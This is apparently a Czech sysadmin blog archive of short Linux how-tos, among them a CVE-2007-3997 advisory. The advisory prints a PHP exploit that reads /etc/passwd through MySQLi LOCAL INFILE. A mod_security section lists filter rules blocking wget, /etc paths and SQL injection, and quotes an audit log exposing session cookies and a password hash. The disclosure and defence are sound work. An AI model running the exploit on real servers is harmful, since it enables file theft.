#!/bin/bash
SERVER_NAME=$1
OPENSSL_PATH=/usr/bin/openssl
$OPENSSL_PATH genrsa -des3 -out $SERVER_NAME.key 1024
$OPENSSL_PATH genrsa -out $SERVER_NAME.key 1024
$OPENSSL_PATH rsa -in $SERVER_NAME.key -out $SERVER_NAME.pem
$OPENSSL_PATH req -new -key $SERVER_NAME.pem -out $SERVER_NAME.csr
$OPENSSL_PATH x509 -req -days 365 -in $SERVER_NAME.csr -signkey $SERVER_NAME.pem -out $SERVER_NAME.crt


Stačí se přihlásit na server, kde jsou uložené zprávy ve formátu MailDir a pak spustit příkaz:
for f in `ls`; do sendmail example@example.com <$f; done
Veškeré emaily v aktuální složce se tím přeposšlou na adresu example@example.com.

# vmware-server-console
/usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_3.4' not found (required by /usr/lib/libcairo.so.2)
/usr/lib/vmware-server-console/bin/vmware-server-console: /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1: version `GCC_4.2.0' not found (required by /usr/lib/libstdc++.so.6)

Pomoc je přitom velice jednoduchá:

# sudo ln -sf /usr/lib/libpng12.so.0 /usr/lib/vmware-server-console/lib/libpng12.so.0/libpng12.so.0
# sudo ln -sf /lib/libgcc_s.so.1 /usr/lib/vmware-server-console/lib/libgcc_s.so.1/libgcc_s.so.1


Pine jsem používal před několika lety společně s fetchmailem. To už by byl dnes problém, neboť potřebuji mít k poště mobilní přístup odkudkoliv (můj mail box čítá více jak 10 000 emailů) a tak jsem začal pátrat, zda-li existuje možnost používat nativně IMAP. Naštěstí existuje!

První co bylo potřeba udělat je vyměnit starý a dnes již nevyvíjený Pine za Alpine. Jako betatester mi posloužil Ivan Bíbr – více na jeho blogu. Ovládání i konfigurační soubory jsou naštěstí stejné, takže mi nečinilo problém Alpine naohýbat k obrazu svému. Dále jsem pokračoval úpravou konfiguračního souboru .pinerc v domovském adresáři.

$ vi ~/.pinerc

V souboru .pinerc jsem upravil konfigurační volby „smtp-server„, „inbox-path“ a „feature-list“ na následující:

Pozn.: Jednotlivé volby je samozřejmě možné „naklikat“ přes menu Alpine, ale takhle mi to přijde jednodušší.

smtp-server=smtp.example.com
inbox-path={mail.example.com/user=test@test.com/ssl/novalidate-cert}INBOX
feature-list=enable-incoming-folders

Ve výše uvedeném příkladu jsem předpokládal, že:
SMTP server je: smtp.example.com
IMAP server je: mail.example.com
Přihlašovací jméno je: test@test.com
K serveru se připojujeme pomocí SSL via self-signed certifikát

Protože Alpine defaultně pracuje s lokálně uloženými složkami, bylo potřeba ho ještě naučit pracovat přímo s IMAPem. postup je velice jednoduchý:

$ alpine
Zmáčkneme S (Setup)
Zmáčkneme L (collectionLists)
Zmáčkneme A (Add Client)

Vyplníme:
Nickname : IMAP složky
Server : mail.example.com/user=test@test.com/ssl/novalidate-cert
Path : INBOX.
View :

Nakonec zmáčkneme klávesu CTRl+x pro uložení změn

Tak a je hotovo – můžu používat IMAP!

Vztahuje se k:
< = PHP 5.2.3
<= PHP 4.4.7

CVE:
CVE-2007-3997

Problém:
Díky rozšířením MySQL a MySQLi v PHP lze obejít bezpečnostní politiku safe_mode.

Detail:
Pomocí funkce MySQL LOCAL INFILE lze získat libovolný soubor ze systému.

Řešení:
1) Kompilovat MySQL klienta s parametrem „–disable-local-infile“
- nepomůže při použití MySQLi, neboť volba se dá znovu povolit příkazem „mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);“
2) Do konfiguračního souboru (/etc/mysql/my.cnf) vložit (do sekce [mysqld]) „set-variable=local-infile=0″.

Exploit:
function r($fp, &$buf, $len, &$err) {print fread($fp, $len);}
$m = new mysqli(‘localhost’, ‘aaaa’, “, ‘a’);
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler(„r“);
$m->query(„LOAD DATA LOCAL INFILE ‘/etc/passwd’ INTO TABLE a.a“);
$m->close();

Instalaci lze provést buďto stažením a zkompilováním zdrojových kódů nebo pomocí předkompilovaných balíčků pro jednotlivé distribuce (jen v komerční verzi). V tomto návodu vám předvedu druhou ze jmenovaných možností.

Před samotnou instalací VirtualBoxu je nutné přidat do APT (soubor sources.list) k základním zdrojům také zdroje universe a multiverse.
#sudo vi /etc/apt/sources.list
deb http://cz.archive.ubuntu.com/ubuntu/ feisty main restricted
deb-src http://cz.archive.ubuntu.com/ubuntu/ feisty main restricted
deb http://cz.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
deb-src http://cz.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
deb http://cz.archive.ubuntu.com/ubuntu/ feisty universe
deb-src http://cz.archive.ubuntu.com/ubuntu/ feisty universe
deb http://cz.archive.ubuntu.com/ubuntu/ feisty multiverse
deb-src http://cz.archive.ubuntu.com/ubuntu/ feisty multiverse
deb http://cz.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb-src http://cz.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu feisty-security main restricted
deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted
deb http://security.ubuntu.com/ubuntu feisty-security universe
deb-src http://security.ubuntu.com/ubuntu feisty-security universe
deb http://security.ubuntu.com/ubuntu feisty-security multiverse
deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse
deb http://packages.medibuntu.org/ feisty free non-free

Pokud použijete můj sources.list, bude potřeba ještě naimportovat klíč pro repozitář mediubuntu.
wget -q http://packages.medibuntu.org/medibuntu-key.gpg -O- | sudo apt-key add -

Nainstalujeme nezbytné balíky pro běh VirtualBoxu (XSLT Procesror, XML parser a QT Gui)
sudo apt-get install libxalan110 libxerces27 libqt3-mt

Stáhneme aktuální verzi VirtualBoxu
wget http://www.virtualbox.org/download/1.5.0/virtualbox_1.5.0-24069-1_Ubuntu_feisty_i386.deb

Nainstalujeeme ji
sudo dpkg -i virtualbox_1.5.0-24069-1_Ubuntu_feisty_i386.deb

Nastavíme sprábná práva na zařízení /dev/vboxdrv
sudo chmod 666 /dev/vboxdrv

Přidáme uživatele pod kterým pracujeme do skupiny vboxusers
sudo usermod -G vboxusers -a uživatel

Nezapomeneme se odhlásit a znovu přihlásit (znovunačtení práv)

Nejprve si stáhneme script, který se stará o pravidelný update ClamAVu (a nastavíme mu práva pro spuštění)
cd /usr/bin
wget http://www.sanesecurity.co.uk/clamav/ss-msrbl.sh
chmod +x ss-msrbl.sh

V dalším kroku upravíme některé parametry podle systému (u mě například)
# vi ss-msrbl.sh
clamscan="/usr/bin/clamdscan"
clam_sigs="/var/clamav"
clam_user="clamav"

Na konec script spustíme
./ss-msrbl.sh

V případě, že je vše ok (tail /var/log/clamav/clamd.log, tail /var/log/clamav/freshclam.log ), nezbývá nám nic jiného, než celý proces zautomatizovat pomocí cronu.
# crontab -e
59 04 * * * /usr/bin/ss-msrbl.sh &> /dev/null


Po týdením sledování můžu konstatovat, že počet obrázků, které prolezli SpamAssassinem, ale nedostali se díky výše uvedenému filtru do OCR je 22,5%, což mi přijde jako docela velké číslo.

Mě osobně se týkají obě situce. V prvním případě jsem potřeboval snížit load datbáze o kterou se dělí hned několik služeb (Radius, SMTP AUTH, stistiky provozu apod.). Ve druhém případě jsem se rozhodl alespoň pro velké uzly postavit samostatné radius servery (s replikovanou databází klientů) které budou vždy připraveny v případě výpadku parentích serverů.

Jak na to?
Na hlavním stroji, ze kterého budeme databázi replikovat musíme nastavit v hlavním konfiguračním souboru MySQL (obvykle /etc/mysql.conf) – konkrétně v sekci [mysqld] následující:

#bind-address = 127.0.0.1
log-bin
server-id=1
binlog-do-db = radius
binlog-do-db = conntrack
binlog-ignore-db = mysql


Pokud je to potřeba, bindneme si MySQL klidně na nějakou jinou IP – ovšem tak ale, aby jsme se na ni z venku dostali.V dalším kroku je potřeba upravit práva pro přístup. To uděláme přes standardní cmd-line utilitu takto:

Přihlásíme se k MySQL a zadáme heslo pro root-a
# mysql -u root -p
Nastavíme práva pro replikaci
mysql> GRANT REPLICATION SLAVE ON *.* TO nejaky_uzivatel@stroj IDENTIFIED BY 'nejake_heslo';FLUSH PRIVILEGES;
Opustíme CMD-line utilitu
mysql> quit

Nyní se přesuneme na stroj kam budeme replikovat. Opět si otevřeme hlavní konfigurační soubor mysql a do sekce [mysqld] přidáme totók:

server-id = 2
master-host = ip_adresa_hlavni_mysql
master-user=nejky_uzivatel
master-password=nejake_heslo
replicate-do-db=databaze
log-warnings


Položky by měly být jasné, pro jistotu je však vysvětlím. Na první řádek dopíšeme IP adresu mysql ze které budeme replikovat, na druhém řádku napíšeme, pod kterým uživatelem a nakonec jakým heslem. Položka server-id značí UNIKÁTNÍ ID. Osobně doporučuji používat pro master ID 1, pro prvního slejva ID 2, pro druhého slejva ID 3 atd…

Co se týče replikace samotné – verze MySQL serverů by měly sedět. Pokud tomu tak není, doporučuji dát alesoň na master server nižšší verzi MySQL než na slave. Také je vhodné před započetím replikace odstranit „všechny chyby“ v databázích (a to příkazem mysqlcheck nazev_datbaze -u root -p –auto-repair). Osobně dělám replikaci z Gentoo Linuxu (MySQL 4.1.21-log) na Ubuntu Linux (MySQL 5.0.24a-Debian_9ubuntu2-log) a nemám jediný problém. Malinká odchylka u různých distribucí obvykle bývá pouze ve výchozích znakových stránkách. Ty velice jednoduše sjednotíte na obou databázových serverech v hlavním konfiguračním souboru například za pomocí následujících parametrů:
character-set-server = utf8
default-character-set = utf8

Aktuálně by již pouhým restartem MySQL serverů mohla začít samotná replikace. Bohužel tento proces by trval neúměrně dlouho a tak je lepší nejprve patřičná data z hlavní databáze zkopírovat na slejva. To lze dvěma způsoby a to pomocí příkazu mysqldump a mysqlrestore nebo klasickým cp přes scp (sftp či jiný protokol). Pro ty z Vás, kteří používáte metodu „drsňák“, upozorrňuji, že po zkopírování je potřeba opravit přístupová práva (obvykle chown -R mysql:mysql /var/lib/mysql).

Po restartu Mastra i Slejva můžete kontrolovat proces replikace. U mastra za pomocí příkazu SHOW MASTER STATUS;, u slejva pak pomocí SHOW SLAVE STATUS\G. Pokud se slejvovi nechce, zkuste ho popohnat příkazem SLAVE START a nebo LOAD DATA FROM MASTER.

Finta Fň je v tom, že emty spoští procesy a apliace pod pseudo terminálem. Co se mi na něm líbí, je jednoduchost. Pro ukázku přikládám 4 scripty z jejich domovské stránky, které se přes telnet přihlásí na stroj a vypíší whoami.

1. script – v Empty
#!/bin/sh
empty -f -i in -o out telnet foo.bar.com
empty -w -i out -o in "ogin:" "luser\n"
empty -w -i out -o in "assword:" "TopSecret\n"
empty -s -o in "who am i\n"
empty -s -o in "exit\n"

2. script – to samé ale v TCL/Expect
#!/usr/bin/expect
spawn telnet foo.bar.com
expect ogin {send luser\r}
expect assword {send TopSecret\r}
send "who am i\r"
send "exit\r"
expect eof

3. script – to samé, ale jako Perl/expect module
#!/usr/bin/perl
use Expect;
my $exp = Expect->spawn("telnet foo.bar.com");
$exp->expect($timeout,
[ 'ogin: $' => sub {
$exp->send("luser\n");
exp_continue; }
],
[ 'assword:$' => sub {
$exp->send("TopSecret\n");
exp_continue; }
],
'-re', qr'[#>:] $'
);
$exp->send("who am i\n");
$exp->send("exit\n");
$exp->soft_close();

4. script – to samé v Python/Pexpect
#!/usr/local/bin/python
import pexpect
child = pexpect.spawn('telnet foo.bar.com');
child.expect('ogin: ');
child.sendline('luser');
child.expect('assword:');
child.sendline('TopSecret');
child.sendline('who am i');
child.sendline('exit');
child.expect(pexpect.EOF);
print child.before;

Tak co – kterou metodu by jste zvolili?

Původně jsem zamýšlel použít globalní .htaccess a vněm mod_rewrite. Chtěl jsem parsovat veškeré požadavky na jednotlivé portály a sanitizovat je. Ačkoliv se toto řešení jevilo jako správné, v praxi jsem od něj musel upustit a najít řešení lepší. Oprášil jsem tak své záložky v prohlížeči a narazil na mod_security do Apache. Něco málo jsem o něm slyšel a už dlouho jsem ho chtěl vyzkoušet – teď k tomu byla velice vhodná příležitost.

Instalace na debianu byla více než snadná:

# 1. Nejprve jsem nainstaloval samotný modul
apt-get install libapache2-mod-security

# 2. Následně jsem jej povolili ke spuštění v Apache
a2enmod mod-security

# 3. Nechtěl jsem vymýšlet celou konfiguraci z hlavy a tak jsem si zkopíroval vzorovou
cp /usr/share/doc/libapache2-mod-security/examples/httpd2.conf.example-full /etc/apache2/conf.d/mod_security.conf

# 4. A tu jsem si upravil
vi /etc/apache2/conf.d/mod_security.conf

SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding Off
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog /var/log/apache2/audit_log
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterDebugLevel 0
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:500"
SecFilter /etc/[0-9a-z]
SecFilter /bin/[0-9a-z]
SecFilter /usr/[0-9a-z]
SecFilter /usr/bin/[0-9a-z]
SecFilter /tmp/[0-9a-z]
SecFilter cd\x20/tmp
SecFilter wget\x20
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"
SecFilter "< [[:space:]]*script"
#SecFilter "<(.|\n)+>"


# 6. Následoval reload Apache serveru
/etc/init.d/apache2 force-reload

Co to všechno umí?
Mod_security nám vyčistí veškeré požadavky (jak GEt tak i POST) od zbytečných dvojitých lomítek (//), odkazů na sebe sama (./), dokáže zaměnit „\“ za „/“, přehodí %00 za obyčejnou mezeru kontroluje validitu a bytovou přesnost požadavku, dokáže vyhodnotit požadavek na základě regexpů.

Na základě detekce „řetezce“ je pak podle konfiguračního souboru (SecFilterDefaultAction) schopný vytvořit i několik akcí mezi něž patří:
deny – zakáže požadavek
allow – zastaví kontrolu pravidel a povolí request
status:xxx, – odpoví s HTTP statusem xxx
redirect:url, – přesměruje požadavek na danou (absolutní) adresu
exec:cmd – vykoná příkaz cmd (vhodné s nějakým odesílátkem emailů)
log – uloží request s detaily do logu
nolog – neukládá request do logu
pass – ignoruje toto pravidlo a pokračuje v dalších pravidlech
pause:xxx – pozdrží request o xxx milisekund (pozor at neprovedete DoS útok na sebe sami)
chain – skočí na další pravidlo v chainu
skipnext:n, přskočí n pravidel

Regexpové filtry
Asi nejjednodušším filtrem v mod_security je zadání SecFilter.
V konfiguračním souboru apache/mod_security máme:
SecFilterEngine On
SecFilterCheckURLEncoding On
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog /var/log/apache2/audit_log
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:500"
SecFilter /etc/passwd

Jakmile do prohlížeče zadáme adresu například http://hodza.net/test.php?shell=/etc/passwd, vyhodí nám prohlížeč chybu 500 a do /var/log/apache2/audit_log zapíše následující:

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/4.3.10-19
Content-Length: 2166
Connection: close
Content-Type: text/html
========================================
Request: 85.160.65.12 - - [21/Mar/2007:11:23:55 +0100] "GET /test.php?shell=/etc/passwd HTTP/1.1" 500 2157
Handler: (null)
----------------------------------------
GET /test.php?shell=/etc/passwd HTTP/1.1
Host: hodza.net
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: IMAIL_SESS_KEY_1174461441-18654=LIuOFNUhDI3vlqgL; IMAIL_SESS_KEY_1174458493-41266=6pdFfVCoIZlnTdz2; IMAIL_SESS_KEY_1174458956-45632=22MSPZFhVgcl4HBF; wpthemefd01865e503f46c67c4df25a7c0983da=Magellan; IMAIL_SESS_KEY_1174458444-78097=yICVpRLlelQ7b4WR; IMAIL_TEST_COOKIE=test; PHPSESSID=4968f3ea1b79953b8e1e20febf5c3bfd; phpMyAdmin=d44d6e2f64ccd35352989d45c30a9b90; wordpressuser_fd01865e503f46c67c4df25a7c0983da=admin; wordpresspass_fd01865e503f46c67c4df25a7c0983da=2fb3192c5df98faf13d864c4a3b1fd06; dbx-postmeta=grabit:0+|1-|2-|3-|4-|5-&advancedstuff:0-|1-|2-
mod_security-message: Access denied with code 500. Pattern match "/etc/passwd" at THE_REQUEST
mod_security-action: 500
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/4.3.10-19
Content-Length: 2157
Connection: close
Content-Type: text/html

Jak vidíte – krásné, jednoduché účinné a spolehlivé.
Další využití mod_security je na snadě. Při psaní příspěvku jsem si vzpomněl na Vlastu, kdy měl v komentářích na blogu snad desetkrát řetězec „Cheap phentermine….“. Přitom stačilo zapnout mod_security a dát do konfiguráku SecFilter „Cheap phentermine“ nebo zakázat spamerského User-Agenta, případně znepřístupnit blok IP adres odkud jsou příspěvky rozesílány.